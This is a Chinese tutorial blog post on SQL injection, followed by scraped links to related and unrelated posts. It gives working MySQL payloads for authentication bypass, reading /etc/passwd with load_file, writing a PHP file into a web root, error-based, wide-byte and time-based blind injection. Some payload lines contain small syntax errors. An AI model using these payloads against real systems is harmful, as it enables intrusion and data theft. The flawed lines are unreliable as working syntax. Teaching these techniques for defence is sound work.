浅谈SQL注入
先看一个sql语句:
select * from admin where username='(此处为用户输入的数据)';
在没有任何过滤的情况下,如果用户输入:' or 1=1 --
这条语句就为:select * from admin where username='' or 1=1 --';
可见,语句执行永远为真。此时就进行了sql注入。
SQL注入有如下分类:
一、数字型注入
初始参数为:id=1
可以构造:id=1 or 1=1 (语句执行永远为真)
id=1 and 1=2 (语句执行永远为假)
id=1' (语句执行会出错)
数字型注入较为简单,而且一般在PHP,ASP等弱类型语言中存在,而对于Java,C#等强类型语言一般不存在。
二、字符型注入
字符型注入首先想到的是闭合单引号。
不难想到:id=1' and 1=2 --
-- 是注释后边的语句。
三、其他注入
sql注入其实可以说就是字符型注入和数字型注入。
还有一些常见的注入,如:
POST注入:注入字段在POST数据中。
Cookie注入:注入字段在Cookie字段中。
延时注入:使用数据库延时特性注入。
base64注入:注入字符串需要经过base64加密。
四、Mysql特性
mysql是一种数据库。
(1)三种注释:
#:注释从“#”字符到行尾。
--:注释“-- ”序列到行尾。注意:“-- ”后面要加一个空格。
/**/:注释/* XXXX */中间的字符。
/**/注释存在一个特点:select id /*!55555,username*/ from users
语句正常执行。/*!55555,username*/的意思是若Mysql版本号高于或者等于5.55.55,语句将会被执行。如果“!”后面不加入版本号,将直接执行sql语句。
(2)mysql函数利用
load_file()函数读文件
读取文件,文件必须在服务器上,文件必须为绝对路径,必须有权限,文件容量小于 max_allowed_packet字节(默认为16MB,最大为1GB),如:
union select 1,load_file('/etc/passwd'),3,4,5,6 #
绕过单引号:union select 1,load_file(字符串转换为十六进制),3,4,5,6 #
union select 1,load_file(char(XX,XX,XX........)),3,4,5,6 # ascii码
into outfile写文件操作
必须持有权限,文件名为绝对路径。
如:select '<?php phpinfo(); ?>' into file 'c:\wwwroot\1.php'
绕过单引号:select char(XX,XX,XX.......) into file 'c:\wwwroot\1.php'
concat 连接字符串
concat(user(),0x2c,database())
concat_ws(0x2c,user(),database()) 0x2c是 逗号的16进制。
五、Mysql报错注入
(1)updatexml
select * from admin where id=1 and updatexml(1,(concat(0x7c,(select @@version))),1);
结果返回一个错误:'|5.1.50-community-log'
(2)extractvalue
select * from admin where id=1 and extractvalue(1,concat(0x7c,(select user())));
结果返回一个错误:'|root@localhost'
(3)floor
select * from admin where id = 1 union select * from (select count(*),concat(floor(rand(0)*2),(select user()))a from information_schema.tables group by a)b
结果返回:Duplicate entry '1root@localhost' for key 'group_key'
六、宽字节注入
如果PHP开启了魔术引号,就会将单引号,双引号,反斜杠和NULL字符加上反斜杠转义。
如:id=' 会输出 \'
这时我们可以使用宽字节注入:id=%d5' 输出:誠' 注入成功。
我们将 誠 进行url编码:%d5%5c
而 \的url编码为:%5c 可见 ,繁体字将反斜杠吃掉了。这就是宽字节注入的原理。
七、长字符截断
原理很简单。
比如在数据库创建三个如下用户:
admin (有三个空格)
admin (有五个空格)
admin (有七个空格)
三个用户名长度不一样,但是如果 查询admin用户名,三个用户名都会被查询到。
假设后台语句是:
select count(*) from users where username='admin' and password='******';
这是存在安全问题的,如果用户创建一个“admin ”用户,即可轻易进入后台,著名的wordpress就被这样的方式攻击过。
八、延时注入
基于时间差异的盲注手段。延时注入需要用到sleep()函数。
如:select * from users where id = 1 and sleep(3) #三秒后执行sql语句。
也可以判断是否存在注入:url+id=1 and sleep(3) 页面三秒左右打开,则存在注入。
通常 会采用和 if 函数 搭配使用,进行爆破字符串。
如: and if(hex(mid(user(),L,1)))=N,sleep(3),1)
L的位置代表字符串的第几个字符,N代表ASCII码。
执行成功,则三秒左右返回页面,否则,和原来相同。
ps:坚持,努力,为梦想奋斗。
浅谈SQL注入的更多相关文章
- 浅谈SQL注入风险 - 一个Login拿下Server
前两天,带着学生们学习了简单的ASP.NET MVC,通过ADO.NET方式连接数据库,实现增删改查. 可能有一部分学生提前预习过,在我写登录SQL的时候,他们鄙视我说:“老师你这SQL有注入,随便都 ...
- 浅谈SQL注入风险 - 一个Login拿下Server(转)
前两天,带着学生们学习了简单的ASP.NET MVC,通过ADO.NET方式连接数据库,实现增删改查. 可能有一部分学生提前预习过,在我写登录SQL的时候,他们鄙视我说:“老师你这SQL有注入,随便都 ...
- 【sql注入】浅谈sql注入中的Post注入
[sql注入]浅谈sql注入中的Post注入 本文来源:i春秋学院 00x01在许多交流群中,我看见很多朋友对于post注入很是迷茫,曾几何,我也是这样,因为我们都被复杂化了,想的太辅助了所以导致现在 ...
- 浅谈SQL注入漏洞以及防范策略
--HeShiwei 2014-5-15 什么是SQL注入 SQL注入,指的是用户通过向登录框输入恶意字符,利用代码的字符串拼接漏洞进行网站注入攻击,最终导致整个网站用户表信息泄露的攻击方式.黑客就是 ...
- 浅谈 SQL 注入(注入篇)
一.SQL注入简介 1.1 什么是SQL注入 在用户可控制的参数上过滤不严或没有任何限制,使得用户将传入的参数(如URL,表单,http header)与SQL语句合并构成一条 SQL语句传递给web ...
- 转【】浅谈sql中的in与not in,exists与not exists的区别_
浅谈sql中的in与not in,exists与not exists的区别 1.in和exists in是把外表和内表作hash连接,而exists是对外表作loop循环,每次loop循环再对内表 ...
- 浅谈sql中的in与not in,exists与not exists的区别
转 浅谈sql中的in与not in,exists与not exists的区别 12月12日北京OSC源创会 —— 开源技术的年终盛典 » sql exists in 1.in和exists ...
- 浅谈sql 、linq、lambda 查询语句的区别
浅谈sql .linq.lambda 查询语句的区别 LINQ的书写格式如下: from 临时变量 in 集合对象或数据库对象 where 条件表达式 [order by条件] select 临时变量 ...
- 浅谈SQL优化入门:3、利用索引
0.写在前面的话 关于索引的内容本来是想写的,大概收集了下资料,发现并没有想象中的简单,又不想总结了,纠结了一下,决定就大概写点浅显的,好吧,就是懒,先挖个浅坑,以后再挖深一点.最基本的使用很简单,直 ...
随机推荐
- 前端常见算法的JS实现
1.冒泡排序 function bubbleSort(arr){ var i = 0, j = 0; for(i=1; i<arr.length; i++){ for(j=0; j<=ar ...
- js 常用正则表达式
1 用户名正则 //用户名正则,4到16位(字母,数字,下划线,减号) var uPattern = /^[a-zA-Z0-9_-]{4,16}$/; //输出 true console.log(uP ...
- elementUI 设置input的只读或禁用
只读:readonly 在data里定义:readonly: true, 然后在input框里加上readonly就可以了. 禁用:disabled 在data里定义:edit: true, 然后在i ...
- jQuery与JS中的map()方法使用
1.jquery中的map()方法 首先看一个简单的实例: $("p").append( $("input").map(function(){ return $ ...
- Nginx 集群 反向代理多个服务器
准备多个服务器,使用 nginx 先做好代理(我这里只有一台服务器,就拷贝两个 tomcat 了,端口分别设置为 8081 和 8082) 1,复制 tomcat cp -r apache-tomca ...
- Flutter Plugin开发流程
这篇文章主要介绍了Flutter Plugin开发流程,包括如何利用Android Studio开发以及发布等. 本文主要给大家介绍如何开发Flutter Plugin中Android的部分.有关Fl ...
- ajax请求经典格式
$.ajax({ url: url, type: "POST", dataType: "json", data: data, success: funtion1 ...
- Linux 中yum的配置
1.进入yum的路径 cd /etc/yum.repos.d 2.将原始的repo文件移入一个新建的backup文件下做备份 mv CentOS* backup 3.在/etc/yum.repos.d ...
- linux c 开发通用结构,框架
转自:http://www.maomao365.com/?p=673 了解其它语言的框架例:java Struts1.Struts2.Hibernate.Mybatis.Ibatis.Spring 等 ...
- Linux 中数组的使用
Linux中数组本人可能用的相对较少,但是会经常遇见,也容易忘记,就顺便记录下来吧 数值类型的数组:一对括号表示数组,数组中元素之间使用“空格”来隔开 arr=(1 2 3 4 5) 字符串类型数组: ...